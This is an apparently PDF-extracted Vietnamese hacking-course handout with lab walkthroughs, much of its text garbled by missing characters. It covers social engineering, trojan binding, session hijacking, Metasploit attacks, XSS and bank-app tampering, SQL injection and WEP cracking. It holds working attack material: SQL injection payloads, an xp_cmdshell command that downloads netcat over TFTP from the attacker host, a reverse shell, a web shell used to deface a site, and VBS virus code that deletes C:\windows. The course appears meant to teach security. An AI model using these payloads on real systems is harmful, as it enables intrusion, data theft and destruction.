Kỹ thuật lừa đảo(Social Engineering) là một thủ thuật được các hacker sử dụng nhiều cho các cuộc xâm nhập vào các hệ thống, mạng máy tính
Trang 1và m t tr lý c a ông này L i d ng lúc hai ng i đi công tác, anh ta s d ng Call ID gi , nhái gi ng nói c a viên tr lý đ g i đ n qu n tr m ng công ty, yêu c u g i m t kh u đ ng
nh p vào h th ng c a t ng giám đ c vì ngài đã quên m t kh u Qu n tr viên ki m tra m t vài thông tin v "viên tr lý", nh ng Kevin đã có đ thông tin và s khôn ngoan đ tr l i K t
qu là Kevin đã l y đ c m t kh u và ki m soát toàn b h th ng m ng c a công ty X
M t hình th c l a đ o khác: M t ngày x u tr i nào đó, b n nh n đ c đi n tho i,
đ u dây bên kia là m t gi ng nói ng t ngào: "Chào anh, d ch v mà anh đang s d ng t i công ty chúng tôi hi n đang b tr c tr c v i account (tài kho n) c a anh ngh anh g i g p thông tin v tài kho n cho chúng tôi đ đi u ch nh l i" M i nghe qua t ng nh đây là m t
ki u l a thô thi n, nh ng xác su t thành công r t cao, đ c bi t khi gi ng nói đó d th ng nh
m y cô tr c t ng đài 1080! Ph ng cách l a đ o t ng t là dùng k thu t "Fake Email Login" V nguyên t c, m i khi đ ng nh p vào h p th thì chúng ta ph i đi n thông tin tài kho n g m username và password r i g i thông tin đ n mail server đ x lý L i d ng đi u này, hacker đã thi t k các trang đ ng nh p gi (Fake Login) đ các thông tin đ c g i đ n cho h
Tóm l i, k thu t Social Engineering r t đa d ng, phong phú và c ng h t s c nguy
hi m do tính hi u qu và s ph bi n K thu t này không đòi h i ph i s d ng quá nhi u y u
t k thu t, th m chí không có liên quan đ n k thu t thu n túy (non-technical) Hacker có th
th c hi n ph ng cách này thông qua th tín, e-mail, đi n tho i, ti p xúc tr c ti p, thông qua
ng i quen, các m i quan h cá nhân nh m d n d , khai thác các thông tin do vô tình b ti t
l t phía ng i dùng VN, k thu t này còn khá m i nên không hi m tr ng h p b đánh
l a m t cách d dàng Ch ng h n n m ngoái, hàng lo t game th MU Global đã m t s ch sành sanh tài s n ( o), khi ngây th đi n thông tin tài kho n c a mình vào m t e-mail gi m o admin MU c a hacker!
(Trích d n)
II/ Các bài Lab:
Trang 2th c hi n bài Lab này, ta s d ng ch ng trình Mini-binder đ ghép file trojan v i hình nh, thay đ i icon và ch ng trình Outlook đ g i email n c danh
Ghép file hình nh và file trojan, đ u tiên ta t o 1 file trojan, l y 1 file nh và file ico
b t k đ ghép
Ta s d ng l nh ‘ MMB “60.ico” “svchost.exe” “cathu.jpg” “trojanhao.exe” ‘ đ ghép file trojan svchost.exe v i cathu.jpg và v i icon là 60.ico
Trang 3Ta vào ToolåOptionåMail setupåView Accountå Ch n Account c n thay đ i và thay đ i thông tin Your Name và E-mail Address
Ti p theo Attach file đính kèm vào và g i Email đi Trong bài Tác gi g i t i đ a ch email mailtestsniff@yahoo.com, và sau đó check mail đ ki m tra th xem mail đã đ n ch a
Trang 4gi ta có thêm 1 k thu t n a là session hijacking th c hi n đ c bài lab này tr c tiên ta
ph i s d ng ARP spoof, sau đó s d ng ph n m m T-sight hay Hunt đ giành l y session t
phía máy n n nhân
II/ Th c hi n bài Lab
Trong bài Lab, tác gi s d ng Vmware đ th c hi n, s d ng máy đ th nghi p TELNET và SSH Còn 2 máy còn l i 1 s d ng Window 2000(đã cài s n tool T-sight) và 1 s Linux đ test SSH
Trang 5Sau khi cài đ t xong, trên máy 192.168.200.1 thi t l p cho phép các máy khác telnet
Và t máy 192.168.200.2 telnet đ n máy 192.168.200.1
Và d li u thu đ c t máy 192.168.200.2, s d ng tính n ng Take Over trong Tool T-sight đ l y session
Trang 6Sau khi Session b l y, session t máy Telnet s b “ Lost connection” và ng i s
d ng trong tr ng h p này không bi t là mình b “Lost Connection “b i nguyên nhân nào Bây gi ta b t Service SSH c a máy Linux b ng l nh “ Service sshd” và test th session hijacking đ i v i traffic ssh
Trang 7II/ Th c Hi n bài lab
Bài Lab 1: T n công Web Server Win 2003(l i Apache)
bi t đ c máy Server c a h th ng có b l i hay không, ta s d ng d ng ph n m m quét đ ki m tra (Ph n này đã đ c h c trong scaning)
Trang 8
Ta không th y thông tin v FTP Server đây, do ph n m m Retina ch có tính n ng
nh n di n các Service c a Microsoft và nh ng Service thông d ng Còn các Service không thông d ng h n thì ph n m m ch th y d i d ng m port Trong tr ng h p này ta th y m port 21
Ta s d ng Metasploit đ khai thác l i Apache và l y đ c (Console)
13 Apache mod_alias and mod_rewrite Buffer Overflow 1
Trang 9Bây gi chúng ta s tìm cách Remote Desktop vào máy 192.168.200.1 Tr c tiên ta
t o 1 user và add user này vào nhóm admin b ng s d ng l nh
Net user vsichao vsichao /add
Net Localgroup Administrators vsichao /add
//đ a user vào nhóm Admin
Ta có th ki m ta l i b ng l nh “ Net user” đ ki m tra th user c a mình đã đ c quy n admin hay ch a
Ti p theo ta th remote Desktop vào máy b ng l nh “ mstsc /v 192.168.200.6” N u không đ c ta s d ng file Openrdp.vbs đ m Remote Desktop Ta s d ng ch ng trình Cisco TFTP Server đ đ y file này Server n n nhân
Trang 10Add user vào và nâng quy n lên Administrator
Remote Desktop vào v i user là cehclass thành công, nh v y ta đã hoàn toàn ki m soát đ c máy n n nhân
Trang 11Bài lab 2: Khai thác l i ng d ng Server U
T ng t nh bài trên, ta s d ng ch ng trinh nmap đ xác đ nh version c a ServerU
và s d ng metaesploit đ t n công
Trang 12II/ Các Bài Lab
Bài Lab 1: Cross Site Scripting
u tiên ta login vào b ng username “jv” và password “ jv789” và ch n ch c n ng
“post message” Sau đó ta post script vào ph n message text
Trang 13Sau đó ta submit đ post script này lên Ta s d ng F5 đ Refresh l i trình duy t và
th y xu t hi n
Lúc này trình duy t c a n n nhân vô tình đã th c hi n script đ c user post lên Server
D a vào script này, tin t c có th n c p cookie c a n n nhân và log in vào h th ng
Bài Lab 2: Insufficient Data Validation
Trong bài Lab này khi chuy n ti n t tài kho n này sang tài s n khác, tham s amout luôn luôn ph i l n h n 0 Tuy nhiên trong 1 s tr ng h p Hacker có th thay đ i con s này
là s âm b ng nh ng ch ng trình “http proxy” K t qu này có th gây h i đ n các kho n tài chính c a ngân hàng HackmeBank
Ta th chuy n v i giá tr Amout 100 t tài kho n b t k sang tài kho n khác
K t qu thành công Ta ti p t c chuy n thêm 1 l n n a nh ng v i giá tr là -100 Tuy nhiên do có ki m tra d i phía client nên vi c chuy n ti n không thành công
Trang 14Bây gi ta s d ng ch ng trình Webscarab làm http proxy và thay đ i thông s đ c POST lên Server
K t qu tr v t Server vi c chuy n ti n v n thành công
Trang 15Ta ki m tra trong Transaction th y có l u l i vi c chuy n ti n
Bài Lab 3: Cookie Manipulation
Trong lúc login, ta xem trong Cookie có tham s CookieloginAttempts, tham s này dùng đ lock session khi ai đó c g ng login vào khi nh p sai hay không bi t password Tham
s này đ m t 5 đ n 0 Khi tham s này b ng 0 là lúc session b Lock Ta có th s d ng Webscarab đ thay đ i tham s này đ tránh vi c Server lock session
Trang 16Bài Lab 4: Authorization Failure
u tiên ta vào xem các account c a user “jc” password “jc789”
Ta th y account Number là 5204320422040005, 5204320422040006, 520432
0422040007, 5204320422040008 User jc ch quán lý đ c các account thông s trên Tuy nhiên ta chú ý đ n ph n URL khi s d ng tính n ng “View Transaction”
Trang 18Bài 11:
SQL INJECTION
I/ Gi i thi u v SQL Injection:
ây là K thu t t n công này l i d ng nh ng l h ng trên ng d ng(không ki m tra k
nh ng kí t nh p t ng i dùng) Th c hi n b ng cách thêm các mã vào các câu l nh hay câu truy v n SQL (thông qua nh ng textbox) tr c khi chuy n cho ng d ng web x lý, Server s
th c hi n và tr v cho trình duy t (k t qu câu truy v n hay nh ng thông báo l i) nh đó mà các tin t c có th thu th p d li u, ch y l nh (trong 1 s tr ng h p) và sau cho có th chi m
đ c quy n ki m soát c a h th ng Sau đây là 1 s th thu t c n b n
1) L y tên table và column hi n hành:
Trang 19username: ' Union select VPASS from VTABLE where VUSER='admin' (1)
password: everything
(1): Trong tr ng h p này admin là m t user mà b n bi t n u không có th b tr ng, nó s cho b n user đ u tiên
KQ: -
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement
containing a UNION operator must have an equal number of expressions in their target lists -
N u KQ ra nh trên có ngh a là b n ph i union thêm nhi u column n a đ t t c column c a table VTABLE đ c Union h t Structure c a nó nh sau:
username: ' Union select VPASS,1,1,1 1,1 from VTABLE where VUSER='admin' (1) password: everything
B n hãy thêm ",1" cho đ n khi k t qu ra đ i lo i nh
-
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'tuibihackroi' to a column of data type int
-
Nh v y Pass c a user 'admin' là 'tuibihackroi'
2) L y h t value c a m t column đã bi t trong m t table đã bi t
Bí quy t đây là “Not in” Structure c a nó nh sau (s d ng ví d v i column c a bài tr c):
V i Vuser là admin ta có th l y đ c các user khác
**** Ð l y danh sách tên các user theo m t quy đ nh mà b n ch n, ví d chi l y các user có
ch a t admin ch ng h n ta dùng “like”: c u trúc
-Login Page::::::
username: ‘ Union select Vuser,1,1,1…,1 from Vtable where username not in (‘admin’) like
%admin%—
Trang 20TABLE_NAME (ch a toàn b table) và table: INFORMATION_SCHEMA.COLUMNS v i column COLUMN_NAME (ch a toàn b column)
username: ‘ UNION SELECT COLUMN_NAME FROM
INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’… ’ and ……
L u ý: N u các b n s d ng không đ c thì có th vì d u + không đ c ch p nh n, lúc đó hãy thay nó === %2b
vd: user: ' %2b convert (int,(select Vpass from Vtable where Vuser='admin'))
5) Run command SQL:
Trang 21login page:::::
user:' ; [command]
-
vd: '; DROP TABLE VTABLE
II/ Th c Hành Bài Lab
Trong bài này Hacker (máy 192.168.1.44) s thông qua Port Web đ t n công vào Server 2000(192.168.1.46) và s upload lên Server 2000 trojan webbase, sau đó ki m soát Server này
u tiên s d ng ph n m m Acunetix đ quét xem Server Web có b l i ng d ng gì không??
Trang 22Ta có th test b ng tay trong tình hu ng này b ng cách thêm d u “ ‘ “ trong form login
Sau đây là 1 s đo n mã đ l y thông tin v Server khi bi t Server b l i SQL
1/lay ten Server name
'and 1=convert(int,@@servername) sp_password
2/lay database name
Trang 234/'and 1=convert(int,@@version) sp_password
5/Lay thong tin table userinfo
' having 1=1 (xem table hien hanh)
' group by userinfo.username having 1=1 (xem column tiep theo)
Sau khi l y thông tin v Server, Hacker th upload lên Server trojan netcat b ng cách
s d ng g i hàm shell trong SQL và tftp Ta đánh vào form login câu l nh sau(ph i nh là máy client s d ng TFTP Server):
';exec master xp_cmdshell "tftp -i 192.168.1.44 get nc123.exe";
Câu l nh này đ c th c thi h th ng Server thông qua SQL, nó s load nc123.exe t TFTP Server 192.168.1.44 Ta ki m tra trên TFTP Server file đã đ c g i hay ch a
Sau khi upload thành công trojan netcat, vi c bây gi là ta ph i ch y nó và s d ng telnet ng c ra bên ngoài Vì lúc này chúng ta đang đ ng sau Firewall nên không th l ng nghe trên port vì client ngoài Firewall không th connect vào đ c
Ch y l ng nghe phía Client
Trang 24Telnet net ng c ra ngoài t Server
Và k t n i netcat đ c hình thành sau khi telnet ng c ra t Server, lúc này chúng ta
đã by pass đ c Firewall
Trang 25Sau khi k t n i đ c màn hình console c a Window, ta ti p t c upload thêm 1 trojan
d i d ng web thông qua TFTP
Trojan web mà chúng ta s d ng là zehir4.asp, đây là trojan khá nhi u ti n d ng T trojan này ta có th th c hi n d dàng vi c xóa Database, vi c download các file t Server
2000 v máy c a mình thông qua Port Web
Trang 26L y database
Thay đ i hình n n c a trang web(deface)
Trang 27Tóm l i l i SQL Injection không nh ng giúp Hacker có nhi u thông tin v table, column mà có th cho phép Hacker s d ng nh ng l nh th c thi h th ng(trong 1 s tr ng
h p) và có th upload trojan vào h th ng Server
Trang 28m ng không dây 802.11 đ a ra các khóa WEP 64 bit nh ng đ c cung c p thêm khóa WEP
128 bit 802.11 không đ a ra các khóa đ c x p x p nh th nào M t WEP bao g m 2 ph n: vector kh i t o (IV) 24 bit và key m t IV đ c phát trong plain text ph n header c a các gói 802.11 Tuy nhiên nó r t d b “crack” Vì v y gi i pháp ti p theo là ph i s d ng các khóa WEP đ ng mà có th thay đ i m t cách th ng xuyên
Chu n 802.11 xác nh n các máy khách s d ng khóa WEP Ti p sau đó chu n công nghi p đã
đ c đ a ra thông qua xác nh n 802.1x đ b sung cho các thi u xót c a chu n 802.11 tr c
nó Tuy nhiên g n đây, tr ng đ i h c Maryland đã minh ch ng b ng tài li u v s c c a v n
đ b o m t ti m n v i giao th c 802.1x này Gi i pháp ngày nay là s d ng s xác nh n l n nhau đ ng n c n “ai đó gi a” t n công và các khóa WEP đ ng, các khóa này đ c x p x p
m t cách c n th n và các kênh mã hóa C hai k thu t này đ c h tr b i giao th c (TLS:
Transport Layer Security) N i b t h n c là vi c khóa per-packet và ki m tra tính toàn v n
c a message ây chính là chu n b o m t 802.11i
II/ Th c hành bài Lab:
th c hành bài lab Crack Wep key, chúng ta ph i có Card m ng h tr vi c thu các packet và g i nh ng gói de-authen ng c l i Access-point, đ ng th i phiên b n Linux hay Window ph i h tr vi c k t n i đ n driver c a Card m ng wifi Trong khuôn kh th c hành bài Crack Wep key, do s d ng Card Wifi không h tr tính n ng g i gói de-authen, arp đ n access point, tác gi c g ng t o ra traffic đ có th thu đ packet sau đó tính toán ra đ c WEP key(vi c tính toán ph thu c vào Packet nh n đ c t Access-point)
Tr c tiên ta ph i t i ch ng trình Crack t http://www.aircrack-ng.org/, trong ph n
m m này, ta s d ng airdump đ thu packet, aircrack đ b khóa WEP Key
Ti p theo ta download driver cho Card m ng(không ph i driver c a chính hãng và driver đ c vi t riêng), đây tác gi s d ng Card Wifi NetGear WG511T
www.wildpackets.com/support/hardware/atheros30_driver i v i Cisco Aironet ta c ng download driver t trang web này Sau đó ta ti n hành cài đ t cho Card Wifi
Trang 29Ti p theo ta s d ng Airdump đ thu packet t Access Point
Trang 30Ta gi l p traffic b ng cách chép 1 d li u l n ch y thông qua Access-Point i v i card m ng h tr ta hoàn toàn có th ch đ ng vi c này
Và lúc này ta th y s l ng packet nh n đ c t card m ng wifi r t nhanh Ta đ i kho ng 20 phút(đ i v i WEP key 64 bit) cho đ n khi packet kho ng t 200 000 đ n 300 000
và s d ng Airdump đ l y WEP key
Trang 31Ta có th th y đ c WEP đã đ c tìm th y là Athen T ng t nh v y đ i v i WEP key 128 bit, nh ng th i gian ch s lâu h n
WEP key 128 bit
Trang 32Bài 13:
VIRUS
I/ Gi i thi u: (tham kh o bài đ c thêm)
II/ Th c hành Lab:
Bài 1: Virus phá h y d li u máy
Ta có th vi t d dàng 1 virus phá h y máy b ng nh ng hàm Format hay delete trong ngôn ng VBS nh sau:
msgbox"Error !"
On Error Resume Next
Set vip_xinh = Createobject("scripting.filesystemobject")
vip_xinh.copyfile wscript.scriptfullname,vip_xinh.GetSpecialFolder(0)& "\ vip_xinh.vbs" Set vip_xinh2= CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile vic & "*.*", True
fso.DeleteFolder vic & "*", True
End Sub
On Error Resume Next
Const vic1 = "C:\windows\"
Delvic1
Sub Delvic1()
Dim fso1
Set fso1 = CreateObject("Scripting.FileSystemObject")
fso1.DeleteFile vic1 & "*.*", True
fso1.DeleteFolder vic1 & "*", True